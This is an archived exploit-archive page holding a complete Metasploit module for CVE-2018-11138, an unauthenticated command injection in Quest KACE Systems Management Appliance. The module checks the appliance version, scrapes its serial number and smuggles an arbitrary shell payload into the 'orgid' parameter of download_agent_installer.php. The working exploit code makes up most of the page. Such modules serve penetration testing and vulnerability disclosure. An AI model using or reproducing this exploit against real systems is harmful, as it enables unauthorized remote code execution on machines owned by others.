exploit the possibilities

Quest KACE Systems Management Command Injection

Quest KACE Systems Management Command Injection
Posted Jun 26, 2018
Authored by Brendan Coles, Leandro Barragan, Guido Leo | Site metasploit.com

This Metasploit module exploits a command injection vulnerability in Quest KACE Systems Management Appliance version 8.0.318 (and possibly prior). The download_agent_installer.php file allows unauthenticated users to execute arbitrary commands as the web server user www. A valid Organization ID is required. The default value is 1. A valid Windows agent version number must also be provided. If file sharing is enabled, the agent versions are available within the \\kace.local\client\agent_provisioning\windows_platform Samba share. Additionally, various agent versions are listed on the KACE website. This Metasploit module has been tested successfully on Quest KACE Systems Management Appliance K1000 version 8.0 (Build 8.0.318).

tags | exploit, web, arbitrary, local, php
systems | windows
advisories | CVE-2018-11138
MD5 | 48ba6b06f4b01737a61a9c63d90ba594

Quest KACE Systems Management Command Injection

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'Quest KACE Systems Management Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability in Quest KACE
Systems Management Appliance version 8.0.318 (and possibly prior).

The `download_agent_installer.php` file allows unauthenticated users
to execute arbitrary commands as the web server user `www`.

A valid Organization ID is required. The default value is `1`.

A valid Windows agent version number must also be provided. If file
sharing is enabled, the agent versions are available within the
`\\kace.local\client\agent_provisioning\windows_platform` Samba share.
Additionally, various agent versions are listed on the KACE website.

This module has been tested successfully on Quest KACE Systems
Management Appliance K1000 version 8.0 (Build 8.0.318).
},
'License' => MSF_LICENSE,
'Privileged' => false,
'Platform' => 'unix', # FreeBSD
'Arch' => ARCH_CMD,
'DisclosureDate' => 'May 31 2018',
'Author' =>
[
'Leandro Barragan', # Discovery and PoC
'Guido Leo', # Discovery and PoC
'Brendan Coles', # Metasploit
],
'References' =>
[
['CVE', '2018-11138'],
['URL', 'https://support.quest.com/product-notification/noti-00000134'],
['URL', 'https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities']
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x27",
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl'
}
},
'Targets' => [['Automatic', {}]],
'DefaultTarget' => 0))
register_options [
OptString.new('SERIAL', [false, 'Serial number', '']),
OptString.new('ORGANIZATION', [true, 'Organization ID', '1']),
OptString.new('AGENT_VERSION', [true, 'Windows agent version', '8.0.152'])
]
end

def check
res = send_request_cgi('uri' => normalize_uri('common', 'download_agent_installer.php'))
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end

unless res.code == 302 && res.headers.to_s.include?('X-KACE-Appliance')
vprint_status 'Remote host is not a Quest KACE appliance'
return CheckCode::Safe
end

unless res.headers['X-KACE-Version'] =~ /\A([0-9]+)\.([0-9]+)\.([0-9]+)\z/
vprint_error 'Could not determine KACE appliance version'
return CheckCode::Detected
end

version = Gem::Version.new res.headers['X-KACE-Version'].to_s
vprint_status "Found KACE appliance version #{version}"

# Patched versions : https://support.quest.com/product-notification/noti-00000134
if version < Gem::Version.new('7.0') ||
(version >= Gem::Version.new('7.0') && version < Gem::Version.new('7.0.121307')) ||
(version >= Gem::Version.new('7.1') && version < Gem::Version.new('7.1.150')) ||
(version >= Gem::Version.new('7.2') && version < Gem::Version.new('7.2.103')) ||
(version >= Gem::Version.new('8.0') && version < Gem::Version.new('8.0.320')) ||
(version >= Gem::Version.new('8.1') && version < Gem::Version.new('8.1.108'))
return CheckCode::Appears
end

CheckCode::Safe
end

def serial_number
return datastore['SERIAL'] unless datastore['SERIAL'].to_s.eql? ''

res = send_request_cgi('uri' => normalize_uri('common', 'about.php'))
return unless res

res.body.scan(/Serial Number: ([A-F0-9]+)/).flatten.first
end

def exploit
check_code = check
unless [CheckCode::Appears, CheckCode::Detected].include? check_code
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end

serial = serial_number
if serial.to_s.eql? ''
print_error 'Could not retrieve appliance serial number. Try specifying a SERIAL.'
return
end
vprint_status "Using serial number: #{serial}"

print_status "Sending payload (#{payload.encoded.length} bytes)"

vars_get = Hash[{
'platform' => 'windows',
'serv' => Digest::SHA256.hexdigest(serial),
'orgid' => "#{datastore['ORGANIZATION']}#; #{payload.encoded} ",
'version' => datastore['AGENT_VERSION']
}.to_a.shuffle]

res = send_request_cgi({
'uri' => normalize_uri('common', 'download_agent_installer.php'),
'vars_get' => vars_get
}, 10)

unless res
fail_with Failure::Unreachable, 'Connection failed'
end

unless res.headers.to_s.include?('KACE') || res.headers.to_s.include?('KBOX')
fail_with Failure::UnexpectedReply, 'Unexpected reply'
end

case res.code
when 200
print_good 'Payload executed successfully'
when 404
fail_with Failure::BadConfig, 'The specified AGENT_VERSION is not valid for the specified ORGANIZATION'
when 302
if res.headers['location'].include? 'error.php'
fail_with Failure::UnexpectedReply, 'Server encountered an error'
end
fail_with Failure::BadConfig, 'The specified SERIAL is incorrect'
else
print_error 'Unexpected reply'
end

register_dir_for_cleanup "/tmp/agentprov/#{datastore['ORGANIZATION']}#;/"
end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    21 Files
  • 2
    Apr 2nd
    35 Files
  • 3
    Apr 3rd
    21 Files
  • 4
    Apr 4th
    16 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    1 Files
  • 7
    Apr 7th
    2 Files
  • 8
    Apr 8th
    23 Files
  • 9
    Apr 9th
    19 Files
  • 10
    Apr 10th
    15 Files
  • 11
    Apr 11th
    14 Files
  • 12
    Apr 12th
    11 Files
  • 13
    Apr 13th
    2 Files
  • 14
    Apr 14th
    5 Files
  • 15
    Apr 15th
    14 Files
  • 16
    Apr 16th
    19 Files
  • 17
    Apr 17th
    19 Files
  • 18
    Apr 18th
    8 Files
  • 19
    Apr 19th
    1 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close